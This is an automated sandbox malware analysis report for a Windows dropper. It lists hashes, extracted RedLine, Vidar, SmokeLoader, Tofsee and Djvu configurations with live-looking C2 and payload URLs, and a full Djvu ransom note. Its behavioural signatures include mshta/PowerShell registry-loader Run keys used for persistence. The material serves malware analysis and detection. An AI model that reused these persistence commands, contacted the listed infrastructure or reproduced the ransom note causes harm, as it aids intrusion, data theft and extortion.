Analysis
max time kernel: 93s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 12-03-2022 19:01
Static task: static1
Behavioral task: behavioral1
  Sample: 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
  Resource: win7-20220311-en
Behavioral task: behavioral2
  Sample: 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
  Resource: win10v2004-en-20220113
General
Target: 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Size: 3.1MB
MD5: ea997966b21de9b9fe246b5846d71f49
SHA1: cd52292099c53419442b0b6fd5ea83066670c577
SHA256: 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca
SHA512: facce05dfb426659aecc47c9cec58b4f32785c050558c739e68635bf54a5c069ffcc654f1d008d08b6d2ab53b805c810b4e86ae4ec38ae80773a3776ff95828f
Malware Config
Extracted: http://62.204.41.71/cs/Fax.oo
Extracted: http://62.204.41.71/cs/RED.oo
Extracted: http://62.204.41.71/Offer/Offer.oo
Extracted: http://62.204.41.71/cs/SkyDrive.oo
Extracted: redline
  DomAni2
  flestriche.xyz:80
Extracted: vidar
  39.4
  706
  https://sergeevih43.tumblr.com/
  profile_id: 706
Extracted: smokeloader
  2020
  http://ppcspb.com/upload/
  http://mebbing.com/upload/
  http://twcamel.com/upload/
  http://howdycash.com/upload/
  http://lahuertasonora.com/upload/
  http://kpotiques.com/upload/
Extracted: tofsee
  patmushta.info
  ovicrush.cn
Extracted: djvu
  http://fuyt.org/test3/get.php
  extension: .xcbg
  offline_id: y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
  payload_url:
    http://zerit.top/dl/build2.exe
    http://fuyt.org/files/1/build3.exe
  ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
DcRat 24 IoCs
DarkCrystal (DC) is a .NET RAT active since June 2019 that is capable of loading additional plugins.
Processes:
pid process
4904 schtasks.exe
4568 schtasks.exe
5384 schtasks.exe
4468 schtasks.exe
4948 schtasks.exe
4788 schtasks.exe
5392 schtasks.exe
5224 schtasks.exe
4516 schtasks.exe
4712 schtasks.exe
4956 schtasks.exe
5000 schtasks.exe
4984 schtasks.exe
4488 schtasks.exe
3176 schtasks.exe
4548 schtasks.exe
5016 schtasks.exe
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
5104 schtasks.exe
1448 schtasks.exe
4592 schtasks.exe
6076 schtasks.exe
4520 schtasks.exe
Detected Djvu ransomware 3 IoCs
Processes:
resource yara_rule
behavioral2/memory/5824-344-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu
behavioral2/memory/5824-341-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu
behavioral2/memory/5824-340-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4488 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4568 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4592 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4948 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5000 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4984 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5016 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 4396 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 4396 schtasks.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule
behavioral2/memory/3192-194-0x0000000000400000-0x000000000041E000-memory.dmp family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule
behavioral2/memory/3528-193-0x0000000004830000-0x00000000048CD000-memory.dmp family_vidar
behavioral2/memory/3528-199-0x0000000000400000-0x000000000442B000-memory.dmp family_vidar
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libstdc++-6.dll aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libstdc++-6.dll aspack_v212_v242
Blocklisted process makes network request 11 IoCs
Processes:
flow pid process
107 4636 rundll32.exe
191 3376 cmd.exe
198 3376 cmd.exe
199 3376 cmd.exe
200 3376 cmd.exe
201 3376 cmd.exe
212 3376 cmd.exe
245 5268 powershell.exe
246 5344 powershell.exe
247 3848 powershell.exe
248 5440 powershell.exe
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
Processes:
pid process
3808 setup_installer.exe
3532 setup_install.exe
2940 arnatic_7.exe
3700 arnatic_5.exe
1900 arnatic_4.exe
2136 arnatic_6.exe
1660 arnatic_2.exe
3528 arnatic_1.exe
2072 arnatic_3.exe
776 jfiag3g_gg.exe
3192 arnatic_7.exe
2252 jfiag3g_gg.exe
2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe
2120 MSBuild.exe
1368 4_yza4q88bogYk_cF59XJjyz.exe
4200 ETuSLYkVQqOjTT_usPKsVG0_.exe
4252 5RLR8rS_aMkp6xiTBY96V6aV.exe
4336 d3381037-203a-43e3-9362-b9ca4e152f72.exe
1420 (no process name recorded)
4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe
5080 WaaSMedicAgent.exe
4148 hO5xKfTb0uXbbkS86n6An9zN.exe
3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe
3988 uowCMbUKdOuQ4Z_MhplAA1pa.exe
1632 AeDLshJf0BYumx9Wg7E57LU8.exe
2032 GlMzB0cjitEHTuadmoJgQMmB.exe
4140 TovKtHieW7V9aCT7Dk2QoIn9.exe
4820 WTNhKoL9ySsIA_Xeeq7dvJd_.exe
1612 Conhost.exe
1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe
3376 cmd.exe
1328 5NhVWerLeg2JkPgGASqWBTL4.exe
1600 ZxU30FwtSCAQFKpXqBqFaTKQ.exe
4900 CPH9q07r6cXvJsVI_KM1RiOL.exe
5044 yAQm8Ifhb_rMkM7EhIDqbE9y.exe
5004 1JL6JbXANF8tluJUl1I2mYPT.exe
4588 3rukoxtBvGYzOvS6XcqPmx7G.exe
5136 Install.exe
5696 Install.exe
5824 KUxPDM3fT73jHaCqN6rtwNRj.exe
1968 AFC2.exe
5880 7z.exe
5508 7z.exe
5928 7z.exe
3404 7z.exe
1580 7z.exe
1060 7z.exe
3796 7z.exe
2560 7z.exe
620 7z.exe
316 7z.exe
4168 Result_protected.exe
1448 schtasks.exe
5328 222.exe
4220 Accostarmi.exe.pif
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 2 IoCs
Processes:
pid process
4236 takeown.exe
5940 icacls.exe
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Result_protected.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Result_protected.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description: Key value queried (all 14 entries)
ioc: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation (all 14 entries)
process (one entry per line):
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Install.exe
ETuSLYkVQqOjTT_usPKsVG0_.exe
arnatic_6.exe
hO5xKfTb0uXbbkS86n6An9zN.exe
5NhVWerLeg2JkPgGASqWBTL4.exe
setup_installer.exe
8zeYyAhCLyy4MXuHDcnSZuq6.exe
5RLR8rS_aMkp6xiTBY96V6aV.exe
8zeYyAhCLyy4MXuHDcnSZuq6.exe
GlMzB0cjitEHTuadmoJgQMmB.exe
AeDLshJf0BYumx9Wg7E57LU8.exe
3rukoxtBvGYzOvS6XcqPmx7G.exe
Result_protected.exe
Loads dropped DLL 60 IoCs
Processes:
pid process (repeated entries collapsed with their count)
3532 setup_install.exe (6 entries)
1660 arnatic_2.exe
1060 rUNdlL32.eXe
3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe (10 entries)
4140 TovKtHieW7V9aCT7Dk2QoIn9.exe (10 entries)
1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe (10 entries)
3376 cmd.exe (10 entries)
1328 5NhVWerLeg2JkPgGASqWBTL4.exe (2 entries)
5880 7z.exe
5508 7z.exe
5928 7z.exe
3404 7z.exe
1580 7z.exe
1060 7z.exe
3796 7z.exe
2560 7z.exe
620 7z.exe
316 7z.exe
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid process
4236 takeown.exe
5940 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Documents and Settings\\WaaSMedicAgent.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\Microsoft.Uev.Office2013CustomActions\\dwm.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\"" ETuSLYkVQqOjTT_usPKsVG0_.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5RLR8rS_aMkp6xiTBY96V6aV = "\"C:\\Users\\Admin\\Documents\\These\\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\System32\\dpnathlp\\winlogon.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64\\OfficeClickToRun.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\docprop\\RuntimeBroker.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\unimdmat\\RuntimeBroker.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ETuSLYkVQqOjTT_usPKsVG0_ = "\"C:\\Users\\Admin\\Documents\\Mh9GBYaC5IGIHnRPtOgGO9qd\\ETuSLYkVQqOjTT_usPKsVG0_.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\runonce\\dwm.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\comuid\\fontdrvhost.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\WMADMOE\\lsass.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\arnatic_7 = "\"C:\\Documents and Settings\\arnatic_7.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\odt\\services.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:(CreateObject(\"WSCrIPt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\\\Microsoft\\\\SkyDrive').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\SysWOW64\\sv-SE\\dllhost.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Result_protected.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
204 ipinfo.io
211 ipinfo.io
212 ipinfo.io
352 ip-api.com
12 ip-api.com
30 ipinfo.io
31 ipinfo.io
197 ipinfo.io
Drops file in System32 directory 17 IoCs
Processes:
description ioc process
File created C:\Windows\SysWOW64\comuid\5b884080fd4f94 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\dpnathlp\winlogon.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\unimdmat\RuntimeBroker.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\runonce\dwm.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\docprop\9e8d7a4ca61bd9 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
File created C:\Windows\SysWOW64\WMADMOE\lsass.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\dwm.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\6cb0b6c459d5d3 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\sv-SE\dllhost.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\sv-SE\5940a34987c991 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\runonce\6cb0b6c459d5d3 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\dpnathlp\cc11b995f2a76d 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\unimdmat\9e8d7a4ca61bd9 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\comuid\fontdrvhost.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\docprop\RuntimeBroker.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Windows\SysWOW64\WMADMOE\6203df4a6bafc7 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
pid process
2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe
4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe
5080 WaaSMedicAgent.exe
1600 ZxU30FwtSCAQFKpXqBqFaTKQ.exe
5080 WaaSMedicAgent.exe
5080 WaaSMedicAgent.exe
5080 WaaSMedicAgent.exe
5080 WaaSMedicAgent.exe
5080 WaaSMedicAgent.exe
Suspicious use of SetThreadContext 5 IoCs
Processes:
description pid process target process
PID 2940 set thread context of 3192 2940 arnatic_7.exe arnatic_7.exe
PID 1420 set thread context of 2548 1420 svchost.exe
PID 1612 set thread context of 5824 1612 Conhost.exe KUxPDM3fT73jHaCqN6rtwNRj.exe
PID 4200 set thread context of 2120 4200 ETuSLYkVQqOjTT_usPKsVG0_.exe reg.exe
PID 5344 set thread context of 2192 5344 powershell.exe RegSvcs.exe
Drops file in Program Files directory 3 IoCs
Processes:
description ioc process
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\e6c9b481da804f 8zeYyAhCLyy4MXuHDcnSZuq6.exe
Drops file in Windows directory 1 IoCs
Processes:
description ioc process
File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
pid pid_target process target process
2084 1060 WerFault.exe rUNdlL32.eXe
3000 3528 WerFault.exe arnatic_1.exe
4688 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe
4332 4252 WerFault.exe 5RLR8rS_aMkp6xiTBY96V6aV.exe
4656 1420 WerFault.exe ezokegez.exe
3060 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe
4840 5044 WerFault.exe yAQm8Ifhb_rMkM7EhIDqbE9y.exe
5144 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe
4944 4900 WerFault.exe CPH9q07r6cXvJsVI_KM1RiOL.exe
5100 5004 WerFault.exe 1JL6JbXANF8tluJUl1I2mYPT.exe
5860 5044 WerFault.exe yAQm8Ifhb_rMkM7EhIDqbE9y.exe
6120 4900 WerFault.exe CPH9q07r6cXvJsVI_KM1RiOL.exe
972 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe
5396 5004 WerFault.exe 1JL6JbXANF8tluJUl1I2mYPT.exe
5568 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe
3700 1332 WerFault.exe PPjZFTHQLVGLf4MI9ZI7vFA6.exe
5156 1368 WerFault.exe 4_yza4q88bogYk_cF59XJjyz.exe
5872 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe
5052 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe
1612 1332 WerFault.exe PPjZFTHQLVGLf4MI9ZI7vFA6.exe
4572 4148 WerFault.exe hO5xKfTb0uXbbkS86n6An9zN.exe
6040 5884 WerFault.exe svchost.exe
5976 5788 WerFault.exe conhost.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AFC2.exe
Checks processor information in registry 2 TTPs 33 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TovKtHieW7V9aCT7Dk2QoIn9.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString PPjZFTHQLVGLf4MI9ZI7vFA6.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 4_yza4q88bogYk_cF59XJjyz.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TovKtHieW7V9aCT7Dk2QoIn9.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5NhVWerLeg2JkPgGASqWBTL4.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4_yza4q88bogYk_cF59XJjyz.exe
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier d3381037-203a-43e3-9362-b9ca4e152f72.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 4_yza4q88bogYk_cF59XJjyz.exe
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ZcZKv3wUd95iiqEdR8N8GIp7.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 d3381037-203a-43e3-9362-b9ca4e152f72.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status 4_yza4q88bogYk_cF59XJjyz.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ZcZKv3wUd95iiqEdR8N8GIp7.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 4_yza4q88bogYk_cF59XJjyz.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information 4_yza4q88bogYk_cF59XJjyz.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5NhVWerLeg2JkPgGASqWBTL4.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 PPjZFTHQLVGLf4MI9ZI7vFA6.exe
